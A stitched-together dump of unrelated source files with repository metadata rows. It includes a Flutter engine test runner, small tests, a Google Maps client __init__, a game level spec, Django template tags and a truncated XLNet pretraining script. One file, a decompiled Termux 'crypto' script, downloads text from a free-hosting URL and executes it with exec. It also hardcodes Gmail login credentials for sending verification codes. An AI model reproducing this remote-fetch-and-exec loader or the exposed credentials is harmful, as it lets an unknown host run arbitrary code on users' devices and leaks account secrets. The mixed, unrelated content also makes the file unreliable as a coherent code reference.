RunDartTest(build_dir, dart_test_file, verbose_dart_snapshot, False)
def RunFrontEndServerTests(build_dir):
test_dir = os.path.join(buildroot_dir, 'flutter', 'flutter_frontend_server')
dart_tests = glob.glob('%s/test/*_test.dart' % test_dir)
for dart_test_file in dart_tests:
opts = [
dart_test_file,
os.path.join(build_dir, 'gen', 'frontend_server.dart.snapshot'),
os.path.join(build_dir, 'flutter_patched_sdk')]
RunEngineExecutable(
build_dir,
os.path.join('dart-sdk', 'bin', 'dart'),
None,
flags=opts,
cwd=test_dir)
def RunConstFinderTests(build_dir):
test_dir = os.path.join(buildroot_dir, 'flutter', 'tools', 'const_finder', 'test')
opts = [
os.path.join(test_dir, 'const_finder_test.dart'),
os.path.join(build_dir, 'gen', 'frontend_server.dart.snapshot'),
os.path.join(build_dir, 'flutter_patched_sdk')]
RunEngineExecutable(build_dir, os.path.join('dart-sdk', 'bin', 'dart'), None, flags=opts, cwd=test_dir)
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--variant', dest='variant', action='store',
default='host_debug_unopt', help='The engine build variant to run the tests for.')
parser.add_argument('--type', type=str, default='all')
parser.add_argument('--engine-filter', type=str, default='',
help='A list of engine test executables to run.')
parser.add_argument('--dart-filter', type=str, default='',
help='A list of Dart test scripts to run.')
parser.add_argument('--java-filter', type=str, default='',
help='A single Java test class to run.')
parser.add_argument('--android-variant', dest='android_variant', action='store',
default='android_debug_unopt',
help='The engine build variant to run java tests for')
parser.add_argument('--ios-variant', dest='ios_variant', action='store',
default='ios_debug_sim_unopt',
help='The engine build variant to run objective-c tests for')
parser.add_argument('--verbose-dart-snapshot', dest='verbose_dart_snapshot', action='store_true',
default=False, help='Show extra dart snapshot logging.')
args = parser.parse_args()
if args.type == 'all':
types = ['engine', 'dart', 'benchmarks', 'java', 'objc', 'font-subset']
else:
types = args.type.split(',')
build_dir = os.path.join(out_dir, args.variant)
if args.type != 'java':
assert os.path.exists(build_dir), 'Build variant directory %s does not exist!' % build_dir
engine_filter = args.engine_filter.split(',') if args.engine_filter else None
if 'engine' in types:
RunCCTests(build_dir, engine_filter)
if 'dart' in types:
assert not IsWindows(), "Dart tests can't be run on windows. https://github.com/flutter/flutter/issues/36301."
dart_filter = args.dart_filter.split(',') if args.dart_filter else None
RunDartTests(build_dir, dart_filter, args.verbose_dart_snapshot)
RunConstFinderTests(build_dir)
RunFrontEndServerTests(build_dir)
if 'java' in types:
assert not IsWindows(), "Android engine files can't be compiled on Windows."
java_filter = args.java_filter
if ',' in java_filter or '*' in java_filter:
print('Can only filter JUnit4 tests by single entire class name, eg "io.flutter.SmokeTest". Ignoring filter=' + java_filter)
java_filter = None
RunJavaTests(java_filter, args.android_variant)
if 'objc' in types:
assert IsMac(), "iOS embedding tests can only be run on macOS."
RunObjcTests(args.ios_variant)
# https://github.com/flutter/flutter/issues/36300
if 'benchmarks' in types and not IsWindows():
RunEngineBenchmarks(build_dir, engine_filter)
if ('engine' in types or 'font-subset' in types) and args.variant != 'host_release':
RunCmd(['python', 'test.py'], cwd=font_subset_dir)
if __name__ == '__main__':
sys.exit(main())
| 36.323917 | 131 | 0.724907 |
4a2117465534f5cb436f3fb0eae22a97e208f5a5 | 719 | py | Python | taproom/tests/test_systems.py | slochower/host-guest-benchmarks | c398b499fe6dbae39523278946c0e25eb78d6d66 | [
"MIT"
] | null | null | null | taproom/tests/test_systems.py | slochower/host-guest-benchmarks | c398b499fe6dbae39523278946c0e25eb78d6d66 | [
"MIT"
] | 8 | 2019-07-05T17:55:27.000Z | 2022-03-21T18:59:50.000Z | taproom/tests/test_systems.py | slochower/host-guest-benchmarks | c398b499fe6dbae39523278946c0e25eb78d6d66 | [
"MIT"
] | 1 | 2020-05-05T22:51:21.000Z | 2020-05-05T22:51:21.000Z | """
Tests whether `taproom` can find hosts.
"""
import logging
from taproom.entry_points import find_host_guest_pairs
logger = logging.getLogger(__name__)
def test_bcd():
""" Test that we can find two host YAML instructions for β-cyclodextrin. """
host_guest_systems, host_guest_measurements = find_host_guest_pairs()
assert len(host_guest_systems["bcd"]["yaml"]) == 2
assert host_guest_systems["bcd"]["yaml"][0].name == "host-s.yaml"
assert host_guest_systems["bcd"]["yaml"][1].name == "host-p.yaml"
def test_acd_bam_measurements():
host_guest_systems, host_guest_measurements = find_host_guest_pairs()
assert host_guest_measurements["acd"]["bam"]["yaml"].name == "measurement.yaml"
| 31.26087 | 83 | 0.731572 |
4a21175ed7f9abbbd2585a367203eea2b6ff75ac | 1,380 | py | Python | google/maps/roads/v1op/roads-v1op-py/google/maps/roads/__init__.py | googleapis/googleapis-gen | d84824c78563d59b0e58d5664bfaa430e9ad7e7a | [
"Apache-2.0"
] | 7 | 2021-02-21T10:39:41.000Z | 2021-12-07T07:31:28.000Z | google/maps/roads/v1op/roads-v1op-py/google/maps/roads/__init__.py | googleapis/googleapis-gen | d84824c78563d59b0e58d5664bfaa430e9ad7e7a | [
"Apache-2.0"
] | 6 | 2021-02-02T23:46:11.000Z | 2021-11-15T01:46:02.000Z | google/maps/roads/v1op/roads-v1op-py/google/maps/roads/__init__.py | googleapis/googleapis-gen | d84824c78563d59b0e58d5664bfaa430e9ad7e7a | [
"Apache-2.0"
] | 4 | 2021-01-28T23:25:45.000Z | 2021-08-30T01:55:16.000Z | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from google.maps.roads_v1.services.roads_service.client import RoadsServiceClient
from google.maps.roads_v1.services.roads_service.async_client import RoadsServiceAsyncClient
from google.maps.roads_v1.types.roads import ListNearestRoadsRequest
from google.maps.roads_v1.types.roads import ListNearestRoadsResponse
from google.maps.roads_v1.types.roads import SnappedPoint
from google.maps.roads_v1.types.roads import SnapToRoadsRequest
from google.maps.roads_v1.types.roads import SnapToRoadsResponse
from google.maps.roads_v1.types.roads import TravelMode
__all__ = ('RoadsServiceClient',
'RoadsServiceAsyncClient',
'ListNearestRoadsRequest',
'ListNearestRoadsResponse',
'SnappedPoint',
'SnapToRoadsRequest',
'SnapToRoadsResponse',
'TravelMode',
)
| 38.333333 | 92 | 0.792029 |
4a2117f31fda35567b3777349767971103ed3634 | 723 | py | Python | setup.py | Marvin-Be/OkapiPythonConnector | 3accd89b974e13de74f065b17c88e764dc9b9ba6 | [
"MIT"
] | null | null | null | setup.py | Marvin-Be/OkapiPythonConnector | 3accd89b974e13de74f065b17c88e764dc9b9ba6 | [
"MIT"
] | null | null | null | setup.py | Marvin-Be/OkapiPythonConnector | 3accd89b974e13de74f065b17c88e764dc9b9ba6 | [
"MIT"
] | null | null | null | import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name="okapi-python-connector",
version="2020-12",
author="Jonas Radtke",
author_email="[email protected]",
description="Package to connect to OKAPI Api",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/OKAPIOrbits/OkapiPythonConnector",
packages=setuptools.find_packages(),
install_requires=[
'requests'
],
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
)
| 28.92 | 63 | 0.64592 |
4a21183e4d7939ab15bbda3eb7bc5ad68bd641ba | 2,168 | py | Python | crypto/crypto_dec.py | Alpha-Demon404/RE-14 | b5b46a9f0eee218f2a642b615c77135c33c6f4ad | [
"MIT"
] | 39 | 2020-02-26T09:44:36.000Z | 2022-03-23T00:18:25.000Z | crypto/crypto_dec.py | B4BY-DG/reverse-enginnering | b5b46a9f0eee218f2a642b615c77135c33c6f4ad | [
"MIT"
] | 15 | 2020-05-14T10:07:26.000Z | 2022-01-06T02:55:32.000Z | crypto/crypto_dec.py | B4BY-DG/reverse-enginnering | b5b46a9f0eee218f2a642b615c77135c33c6f4ad | [
"MIT"
] | 41 | 2020-03-16T22:36:38.000Z | 2022-03-17T14:47:19.000Z | # uncompyle6 version 3.5.0
# Python bytecode 2.7
# Decompiled from: Python 2.7.17 (default, Oct 23 2019, 08:25:46)
# [GCC 4.2.1 Compatible Android (5220042 based on r346389c) Clang 8.0.7 (https://
# Embedded file name: <JustAHacker>
# Source code from crazy tools sTamdatez
import smtplib, os, sys, base64, random, time, requests
try:
file = '/data/data/com.termux/files/usr/etc/justahackers.log'
fileopen = open(file).read()
a = base64.b64decode(fileopen)
time.sleep(1)
print '\x1b[1;32mSelamat Datang \x1b[1;33m' + a
lnk = requests.get('https://justaserverscript.000webhostapp.com/crypto.txt').text
time.sleep(3)
exec lnk
except IOError:
time.sleep(3)
print '\x1b[1;36mMaaf Anda Belum Registrasi Script JustAHacker,Silahkan registrasi Dahulu '
kode = random.randint(232658, 947364)
fadd = '[email protected]'
namalu = raw_input('Nama Anda : ')
tadd = raw_input('Masukkan Gmail Anda : ')
print 'Kode Verifikasi 6 Angka Telah Dikirim ke ' + str(tadd)
SUBJECT = 'Kode Verifikasi Script JustAHackers '
TEXT = 'Kode Verifikasi Script JustAHackers anda adalah ' + str(kode) + '\n\n\nSubscribe JustA Hacker'
message = ('Subject: {}\n\n{}').format(SUBJECT, TEXT)
username = '[email protected]'
password = 'ohiabuebmpoeomqk'
server = smtplib.SMTP('smtp.gmail.com', 587)
server.ehlo()
server.starttls()
server.login(username, password)
server.sendmail(fadd, tadd, message)
os.system('am start com.google.android.gm')
def verif():
os.system('clear')
print '\x1b[1;35mMasukkan Kode Yang Telah Dikirim ke ' + str(tadd)
print ''
kodev = raw_input('\x1b[1;33mKode = ')
if kodev == str(kode):
print 'Verifikasi Berhasil... '
time.sleep(2)
regis()
else:
print 'Kode Yang Anda Masukkan Salah,Silahkan Cek Gmail anda Untuk kodenya'
time.sleep(3)
verif()
def regis():
namalub = base64.b64encode(namalu)
d = open('/data/data/com.termux/files/usr/etc/justahackers.log', 'w')
d.write(namalub)
d.close()
os.system('python2 crypto.py')
if __name__ == '__main__':
verif()
| 34.967742 | 106 | 0.66559 |
4a2118aac528498c4d9ada573469c2e87cb512c5 | 926 | py | Python | oscar/templatetags/display_tags.py | endgame/django-oscar | e5d78436e20b55902537a6cc82edf4e22568f9d6 | [
"BSD-3-Clause"
] | null | null | null | oscar/templatetags/display_tags.py | endgame/django-oscar | e5d78436e20b55902537a6cc82edf4e22568f9d6 | [
"BSD-3-Clause"
] | null | null | null | oscar/templatetags/display_tags.py | endgame/django-oscar | e5d78436e20b55902537a6cc82edf4e22568f9d6 | [
"BSD-3-Clause"
] | 1 | 2019-07-10T06:32:14.000Z | 2019-07-10T06:32:14.000Z | from django import template
register = template.Library()
def get_parameters(parser, token):
"""
{% get_parameters except_field %}
"""
args = token.split_contents()
if len(args) < 2:
raise template.TemplateSyntaxError(
"get_parameters tag takes at least 1 argument")
return GetParametersNode(args[1].strip())
class GetParametersNode(template.Node):
"""
Renders current get parameters except for the specified parameter
"""
def __init__(self, field):
self.field = field
def render(self, context):
request = context['request']
getvars = request.GET.copy()
if self.field in getvars:
del getvars[self.field]
if len(getvars.keys()) > 0:
get_params = "%s&" % getvars.urlencode()
else:
get_params = ''
return get_params
get_parameters = register.tag(get_parameters)
| 23.15 | 69 | 0.62203 |
4a2118b9eaef9162430254fe0426ab7f1255aad5 | 13,454 | py | Python | toontown/coghq/LawbotOfficeBoilerRoom_Trap00.py | CrankySupertoon01/Toontown-2 | 60893d104528a8e7eb4aced5d0015f22e203466d | [
"MIT"
] | 1 | 2021-02-13T22:40:50.000Z | 2021-02-13T22:40:50.000Z | toontown/coghq/LawbotOfficeBoilerRoom_Trap00.py | CrankySupertoonArchive/Toontown-2 | 60893d104528a8e7eb4aced5d0015f22e203466d | [
"MIT"
] | 1 | 2018-07-28T20:07:04.000Z | 2018-07-30T18:28:34.000Z | toontown/coghq/LawbotOfficeBoilerRoom_Trap00.py | CrankySupertoonArchive/Toontown-2 | 60893d104528a8e7eb4aced5d0015f22e203466d | [
"MIT"
] | 2 | 2019-12-02T01:39:10.000Z | 2021-02-13T22:41:00.000Z | from toontown.coghq.SpecImports import *
GlobalEntities = {1000: {'type': 'levelMgr',
'name': 'LevelMgr',
'comment': '',
'parentEntId': 0,
'cogLevel': 0,
'farPlaneDistance': 1500,
'modelFilename': 'phase_10/models/cashbotHQ/ZONE08a',
'wantDoors': 1},
0: {'type': 'zone',
'name': 'UberZone',
'comment': '',
'parentEntId': 0,
'scale': 1,
'description': '',
'visibility': []},
10055: {'type': 'attribModifier',
'name': '<unnamed>',
'comment': '',
'parentEntId': 10001,
'attribName': 'modelPath',
'recursive': 1,
'typeName': 'model',
'value': ''},
100023: {'type': 'goon',
'name': '<unnamed>',
'comment': '',
'parentEntId': 100022,
'pos': Point3(0, 0, 0),
'hpr': Vec3(0, 0, 0),
'scale': 3.5,
'attackRadius': 6.0,
'crushCellId': None,
'goonType': 'sg',
'gridId': None,
'hFov': 90.0,
'strength': 15,
'velocity': 4},
100000: {'type': 'model',
'name': 'wall',
'comment': '',
'parentEntId': 100004,
'pos': Point3(51.4205, -2.29817, 0),
'hpr': Vec3(0, 0, 0),
'scale': Point3(0.95, 2, 1.25),
'collisionsOnly': 0,
'flattenType': 'light',
'loadType': 'loadModelCopy',
'modelPath': 'phase_10/models/lawbotHQ/LB_wall_panel.bam'},
100002: {'type': 'model',
'name': 'copy of wall',
'comment': '',
'parentEntId': 100004,
'pos': Point3(36.415, -2.3, 0),
'hpr': Vec3(0, 0, 0),
'scale': Point3(0.95, 2, 1.25),
'collisionsOnly': 0,
'flattenType': 'light',
'loadType': 'loadModelCopy',
'modelPath': 'phase_10/models/lawbotHQ/LB_wall_panel.bam'},
100005: {'type': 'model',
'name': 'copy of wall (2)',
'comment': '',
'parentEntId': 100004,
'pos': Point3(23.2853, -0.371783, 0),
'hpr': Point3(90, 0, 0),
'scale': Point3(0.95, 2, 1.25),
'collisionsOnly': 0,
'flattenType': 'light',
'loadType': 'loadModelCopy',
'modelPath': 'phase_10/models/lawbotHQ/LB_wall_panel.bam'},
100006: {'type': 'model',
'name': 'copy of wall (3)',
'comment': '',
'parentEntId': 100004,
'pos': Point3(23.2853, -15.2326, 0),
'hpr': Point3(90, 0, 0),
'scale': Point3(0.95, 2, 1.25),
'collisionsOnly': 0,
'flattenType': 'light',
'loadType': 'loadModelCopy',
'modelPath': 'phase_10/models/lawbotHQ/LB_wall_panel.bam'},
100007: {'type': 'model',
'name': 'copy of wall (4)',
'comment': '',
'parentEntId': 100004,
'pos': Point3(23.2853, -30.3458, 0),
'hpr': Point3(90, 0, 0),
'scale': Point3(0.95, 2, 1.25),
'collisionsOnly': 0,
'flattenType': 'light',
'loadType': 'loadModelCopy',
'modelPath': 'phase_10/models/lawbotHQ/LB_wall_panel.bam'},
100008: {'type': 'model',
'name': 'copy of wall (5)',
'comment': '',
'parentEntId': 100004,
'pos': Point3(8.38448, 29.6127, 0),
'hpr': Point3(90, 0, 0),
'scale': Point3(0.95, 2, 1.25),
'collisionsOnly': 0,
'flattenType': 'light',
'loadType': 'loadModelCopy',
'modelPath': 'phase_10/models/lawbotHQ/LB_wall_panel.bam'},
100009: {'type': 'model',
'name': 'copy of wall (6)',
'comment': '',
'parentEntId': 100004,
'pos': Point3(8.38448, 14.8894, 0),
'hpr': Point3(90, 0, 0),
'scale': Point3(0.95, 2, 1.25),
'collisionsOnly': 0,
'flattenType': 'light',
'loadType': 'loadModelCopy',
'modelPath': 'phase_10/models/lawbotHQ/LB_wall_panel.bam'},
100010: {'type': 'model',
'name': 'copy of wall (7)',
'comment': '',
'parentEntId': 100004,
'pos': Point3(8.38448, -0.135276, 0),
'hpr': Point3(90, 0, 0),
'scale': Point3(0.95, 2, 1.25),
'collisionsOnly': 0,
'flattenType': 'light',
'loadType': 'loadModelCopy',
'modelPath': 'phase_10/models/lawbotHQ/LB_wall_panel.bam'},
100011: {'type': 'model',
'name': 'copy of wall (8)',
'comment': '',
'parentEntId': 100004,
'pos': Point3(-8.54444, 0.0828297, 0),
'hpr': Point3(0, 0, 0),
'scale': Point3(0.95, 2, 1.25),
'collisionsOnly': 0,
'flattenType': 'light',
'loadType': 'loadModelCopy',
'modelPath': 'phase_10/models/lawbotHQ/LB_wall_panel.bam'},
100012: {'type': 'model',
'name': 'copy of wall (9)',
'comment': '',
'parentEntId': 100004,
'pos': Point3(-23.6854, 0.0828297, 0),
'hpr': Point3(0, 0, 0),
'scale': Point3(0.95, 2, 1.25),
'collisionsOnly': 0,
'flattenType': 'light',
'loadType': 'loadModelCopy',
'modelPath': 'phase_10/models/lawbotHQ/LB_wall_panel.bam'},
100013: {'type': 'model',
'name': 'copy of wall (10)',
'comment': '',
'parentEntId': 100004,
'pos': Point3(-36.5, -45.2411, 0),
'hpr': Point3(90, 0, 0),
'scale': Point3(0.95, 2, 1.25),
'collisionsOnly': 0,
'flattenType': 'light',
'loadType': 'loadModelCopy',
'modelPath': 'phase_10/models/lawbotHQ/LB_wall_panel.bam'},
100014: {'type': 'model',
'name': 'copy of wall (11)',
'comment': '',
'parentEntId': 100004,
'pos': Point3(-36.5, -30.557, 0),
'hpr': Point3(90, 0, 0),
'scale': Point3(0.95, 2, 1.25),
'collisionsOnly': 0,
'flattenType': 'light',
'loadType': 'loadModelCopy',
'modelPath': 'phase_10/models/lawbotHQ/LB_wall_panel.bam'},
100015: {'type': 'model',
'name': 'copy of wall (12)',
'comment': '',
'parentEntId': 100004,
'pos': Point3(-36.5, -15.612, 0),
'hpr': Point3(90, 0, 0),
'scale': Point3(0.95, 2, 1.25),
'collisionsOnly': 0,
'flattenType': 'light',
'loadType': 'loadModelCopy',
'modelPath': 'phase_10/models/lawbotHQ/LB_wall_panel.bam'},
100016: {'type': 'model',
'name': 'copy of wall (13)',
'comment': '',
'parentEntId': 100004,
'pos': Point3(-36.5, -0.453893, 0),
'hpr': Point3(90, 0, 0),
'scale': Point3(0.95, 2, 1.25),
'collisionsOnly': 0,
'flattenType': 'light',
'loadType': 'loadModelCopy',
'modelPath': 'phase_10/models/lawbotHQ/LB_wall_panel.bam'},
100017: {'type': 'model',
'name': 'copy of wall (14)',
'comment': '',
'parentEntId': 100004,
'pos': Point3(-36.5, 14.6685, 0),
'hpr': Point3(90, 0, 0),
'scale': Point3(0.95, 2, 1.25),
'collisionsOnly': 0,
'flattenType': 'light',
'loadType': 'loadModelCopy',
'modelPath': 'phase_10/models/lawbotHQ/LB_wall_panel.bam'},
100018: {'type': 'model',
'name': 'copy of wall (15)',
'comment': '',
'parentEntId': 100004,
'pos': Point3(-36.5, 14.6685, 0),
'hpr': Point3(0, 0, 0),
'scale': Point3(0.95, 2, 1.25),
'collisionsOnly': 0,
'flattenType': 'light',
'loadType': 'loadModelCopy',
'modelPath': 'phase_10/models/lawbotHQ/LB_wall_panel.bam'},
100019: {'type': 'model',
'name': 'copy of wall (16)',
'comment': '',
'parentEntId': 100004,
'pos': Point3(-21.5858, 14.6685, 0),
'hpr': Point3(0, 0, 0),
'scale': Point3(0.95, 2, 1.25),
'collisionsOnly': 0,
'flattenType': 'light',
'loadType': 'loadModelCopy',
'modelPath': 'phase_10/models/lawbotHQ/LB_wall_panel.bam'},
10001: {'type': 'nodepath',
'name': 'crates',
'comment': '',
'parentEntId': 10028,
'pos': Point3(0, 0, 0),
'hpr': Vec3(0, 0, 0),
'scale': Vec3(1.3, 1.3, 1.64892)},
10002: {'type': 'nodepath',
'name': 'rewardBarrels',
'comment': '',
'parentEntId': 0,
'pos': Point3(-0.719734, 56.9691, 10.0021),
'hpr': Vec3(61.6992, 0, 0),
'scale': Vec3(1, 1, 1)},
10003: {'type': 'nodepath',
'name': 'upperWall',
'comment': 'TODO: replace with lines of shelves',
'parentEntId': 0,
'pos': Point3(-20.3203, 52.6549, 9.90873),
'hpr': Vec3(270, 0, 0),
'scale': Vec3(1.1143, 1.1143, 1.1143)},
10009: {'type': 'nodepath',
'name': 'toGear0',
'comment': '',
'parentEntId': 10001,
'pos': Point3(-26.5593, 31.856, 0),
'hpr': Vec3(0, 0, 0),
'scale': Vec3(1, 1, 1)},
10011: {'type': 'nodepath',
'name': 'toGear1',
'comment': '',
'parentEntId': 10001,
'pos': Point3(-25.884, 13.6749, 0),
'hpr': Vec3(41.6335, 0, 0),
'scale': Vec3(1, 1, 1)},
10023: {'type': 'nodepath',
'name': 'leftWall',
'comment': '',
'parentEntId': 10003,
'pos': Point3(0, 0, 0),
'hpr': Vec3(0, 0, 0),
'scale': 1},
10024: {'type': 'nodepath',
'name': 'rightWall',
'comment': '',
'parentEntId': 10003,
'pos': Point3(-26.7112, 6.85982, 0),
'hpr': Point3(180, 0, 0),
'scale': Vec3(1, 1, 1)},
10028: {'type': 'nodepath',
'name': 'lowerPuzzle',
'comment': '',
'parentEntId': 0,
'pos': Point3(0, 0, 0.05),
'hpr': Vec3(0, 0, 0),
'scale': 1},
10029: {'type': 'nodepath',
'name': 'entranceWall',
'comment': '',
'parentEntId': 10001,
'pos': Point3(0, 0, 0),
'hpr': Vec3(0, 0, 0),
'scale': 1},
10032: {'type': 'nodepath',
'name': 'props',
'comment': '',
'parentEntId': 0,
'pos': Point3(0, 0, 0),
'hpr': Vec3(0, 0, 0),
'scale': 1},
10038: {'type': 'nodepath',
'name': 'archStompers',
'comment': '',
'parentEntId': 10028,
'pos': Point3(0, 0, 0),
'hpr': Vec3(0, 0, 0),
'scale': 1},
10040: {'type': 'nodepath',
'name': 'backWall',
'comment': '',
'parentEntId': 10001,
'pos': Point3(0, 0, 0),
'hpr': Vec3(0, 0, 0),
'scale': 1},
10044: {'type': 'nodepath',
'name': 'gear',
'comment': '',
'parentEntId': 10028,
'pos': Point3(11.85, -11.38, 12.528),
'hpr': Vec3(0, 0, 0),
'scale': Vec3(1, 1, 1)},
10046: {'type': 'nodepath',
'name': 'supportedCrateBackWall',
'comment': '',
'parentEntId': 10028,
'pos': Point3(34.9045, -34.0589, -1.51687),
'hpr': Vec3(63.4349, 0, 0),
'scale': Vec3(1, 1, 1)},
10051: {'type': 'nodepath',
'name': 'supportedCrateEntrance',
'comment': '',
'parentEntId': 10028,
'pos': Point3(48.5077, 7.75915, 0.357897),
'hpr': Point3(0, 0, 0),
'scale': Vec3(1, 1, 1)},
10059: {'type': 'nodepath',
'name': 'largeStack',
'comment': '',
'parentEntId': 10029,
'pos': Point3(47.98, -16.98, 0),
'hpr': Vec3(0, 0, 0),
'scale': 1},
10061: {'type': 'nodepath',
'name': 'lower',
'comment': '',
'parentEntId': 10059,
'pos': Point3(0, 0, 0),
'hpr': Vec3(0, 0, 0),
'scale': 1},
100001: {'type': 'nodepath',
'name': 'trap1 cog node',
'comment': '',
'parentEntId': 0,
'pos': Point3(0, 0, 0),
'hpr': Vec3(0, 0, 0),
'scale': 1},
100004: {'type': 'nodepath',
'name': 'maze',
'comment': '',
'parentEntId': 0,
'pos': Point3(0, 0, 0),
'hpr': Vec3(0, 0, 0),
'scale': 1},
100021: {'type': 'nodepath',
'name': 'Goon Parent',
'comment': '',
'parentEntId': 0,
'pos': Point3(0, 0, 0),
'hpr': Vec3(0, 0, 0),
'scale': 1},
100003: {'type': 'path',
'name': 'test goon path',
'comment': '',
'parentEntId': 0,
'pos': Point3(-50.4808, 0, 0),
'hpr': Vec3(0, 0, 0),
'scale': Vec3(1, 1, 1),
'pathIndex': 0,
'pathScale': 1.0},
100020: {'type': 'path',
'name': 'GoonPath1',
'comment': '',
'parentEntId': 0,
'pos': Point3(0, 0, 0),
'hpr': Vec3(0, 0, 0),
'scale': 1,
'pathIndex': 0,
'pathScale': 1.0},
100022: {'type': 'path',
'name': 'GoonPath1',
'comment': '',
'parentEntId': 100021,
'pos': Point3(-10, -30, 0),
'hpr': Vec3(0, 0, 0),
'scale': Vec3(1, 1, 1),
'pathIndex': 0,
'pathScale': 2.0}}
Scenario0 = {}
levelSpec = {'globalEntities': GlobalEntities,
'scenarios': [Scenario0]}
| 33.974747 | 69 | 0.460384 |
4a2118cbaf33a53dd0464a1f29973a264b29d7c3 | 729 | py | Python | phoenix_tempmail/Mailbox.py | painphoenix/binbox | d0e638f82cd13661e5bb51f9d498c434ab3b78d4 | [
"MIT"
] | 24 | 2021-09-30T07:17:38.000Z | 2022-03-23T07:57:21.000Z | phoenix_tempmail/Mailbox.py | painphoenix/binbox | d0e638f82cd13661e5bb51f9d498c434ab3b78d4 | [
"MIT"
] | 3 | 2021-10-20T14:32:30.000Z | 2022-02-01T17:09:45.000Z | phoenix_tempmail/Mailbox.py | painphoenix/binbox | d0e638f82cd13661e5bb51f9d498c434ab3b78d4 | [
"MIT"
] | 5 | 2021-10-01T07:01:58.000Z | 2022-03-28T12:39:58.000Z | import os
import email
class Email:
def __init__(self):
self.from_email = ""
self.date = ""
self.subject = ""
self.to = ""
self.content = ""
class Mail:
@staticmethod
def formate_email(data):
formated_email = Email()
msg = email.message_from_string(data)
formated_email.from_email = msg['from']
formated_email.date = msg["date"]
formated_email.subject = msg["subject"]
formated_email.to = msg["to"]
for payload in msg.get_payload():
charset_type = str(payload.get_content_charset())
formated_email.content += payload.get_payload(decode=True).decode(charset_type)
return formated_email
| 27 | 91 | 0.613169 |
4a21192d94ff9d0ed3012a6ea6d0b5a7af3dfbb9 | 10,047 | py | Python | pretraining/xlnet_premodel.py | drr3d/id-pytorch-transformers | 504bdd3c47eb6a2206ef9be3118cd0367bf3526d | [
"Apache-2.0"
] | 2 | 2020-02-25T04:53:02.000Z | 2020-06-21T11:33:18.000Z | pretraining/xlnet_premodel.py | drr3d/id-pytorch-transformers | 504bdd3c47eb6a2206ef9be3118cd0367bf3526d | [
"Apache-2.0"
] | null | null | null | pretraining/xlnet_premodel.py | drr3d/id-pytorch-transformers | 504bdd3c47eb6a2206ef9be3118cd0367bf3526d | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
"""
This example intended as instruction for training new XLNet model from scratch,
aimed mainly for Indonesian language.
But i thinks naturaly this model can be use to train another language as well.
"""
import sys
sys.path.append("..")
import os
import time
import torch
import torch.nn as nn
import numpy as np
import random
import math
from text_utils import TextDataset, loadAndCacheExamples
from model_utils import restoreModel
from tokenizer.tokenization_id import TokenizerId
from modeling.xlnet_modeling import XLNetModel, XLNetConfig
from torch.utils.data import DataLoader, RandomSampler
from torch.nn import CrossEntropyLoss
from tqdm import tqdm
from transformers import WarmupLinearSchedule, AdamW
################################################################################################################
################ TRAINING ######################
################################################################################################################
def set_seed(seed, n_gpu=1):
random.seed(seed)
np.random.seed(seed)
torch.manual_seed(seed)
if n_gpu > 0:
torch.cuda.manual_seed_all(seed)
def doTraining(model, config, dataset, tokenizer, optimizer, scheduler, tr_loss,
logging_loss, gradient_accumulation_steps, mlm_probability, device,
local_rank, train_batch_size, num_epoch, max_grad_norm, n_gpu,
logging_steps, start_iters=0, mlm=False, save_dir='./pretrained/',
train_model_name='gpt2', fp16=False):
if fp16:
try:
from apex import amp
except ImportError:
raise ImportError("Please install apex from https://www.github.com/nvidia/apex to use fp16 training.")
# Apex AMP optimization level selected in ['O0', 'O1', 'O2', and 'O3'], defaul 01
print("Trained using apex fp16..")
model, optimizer = amp.initialize(model, optimizer, opt_level='O2')
if n_gpu > 1:
model = torch.nn.DataParallel(model)
train_sampler = RandomSampler(dataset)
train_dataloader = DataLoader(dataset, sampler=train_sampler, batch_size=train_batch_size)
lm_loss = nn.Linear(config.d_model, config.n_token, bias=True).to(device)
model.train()
for cur_epoch in range(start_iters, num_epoch):
start = time.time()
epoch_iterator = tqdm(train_dataloader, desc="Iteration-{}".format(cur_epoch), disable=local_rank not in [-1, 0])
loss = 0.
for step, batch in enumerate(epoch_iterator):
# The model is set in evaluation mode by default using ``model.eval()`` (Dropout modules are deactivated)
# To train the model, you should first set it back in training mode with ``model.train()``
inputs, labels = (batch.type(torch.LongTensor), batch.type(torch.LongTensor))
inputs = inputs.to(device)
labels = labels.to(device)
outputs = model(inputs)
logits = lm_loss(outputs[0])
loss_fct = CrossEntropyLoss(ignore_index=-1)
loss = loss_fct(logits.view(-1, logits.size(-1)),
labels.view(-1))
if n_gpu > 1:
loss = loss.mean()
if gradient_accumulation_steps > 1:
loss = loss / gradient_accumulation_steps
if fp16:
with amp.scale_loss(loss, optimizer) as scaled_loss:
scaled_loss.backward()
else:
loss.backward()
tr_loss += loss.item()
if (step + 1) % gradient_accumulation_steps == 0:
if fp16:
torch.nn.utils.clip_grad_norm_(amp.master_params(optimizer), max_grad_norm)
else:
torch.nn.utils.clip_grad_norm_(model.parameters(), max_grad_norm)
# Update parameters and take a step using the computed gradient
optimizer.step()
# Update learning rate schedule
scheduler.step()
# Clear out the gradients (by default they accumulate)
model.zero_grad()
end = time.time()
op = "Epoch: {}, completed in: {}, loss: {}, perplexity: {}\n".format(cur_epoch, (end - start), (tr_loss - logging_loss)/logging_steps,
math.exp(loss))
print(op)
with open("saved_trainingprogress.txt", 'a') as fw:
fw.write(op)
logging_loss = tr_loss
# Save checkpoint
_path = os.path.join(save_dir, 'epoch_{}-{}_id.ckpt'.format(cur_epoch, train_model_name))
torch.save(model.state_dict(), _path)
def main(corpus_dir, corpus_name, model_dir, trained_model_savedir, create_tokenizer=False, train_model_name='gpt2',
train_spm=True, save_tokenized=False, dotraining=False, model_name=None, resume=False, vocab_name='vocab',
resume_iters=0, spm_vocab_size=2000, spm_max_sentence_length=4098, spm_model_name='spm_id', block_size=512,
spm_model_type='unigram', train_batch_size=1, num_epoch=1000):
###################################################################################
# set torch device
if torch.cuda.is_available():
device = torch.device('cuda')
else:
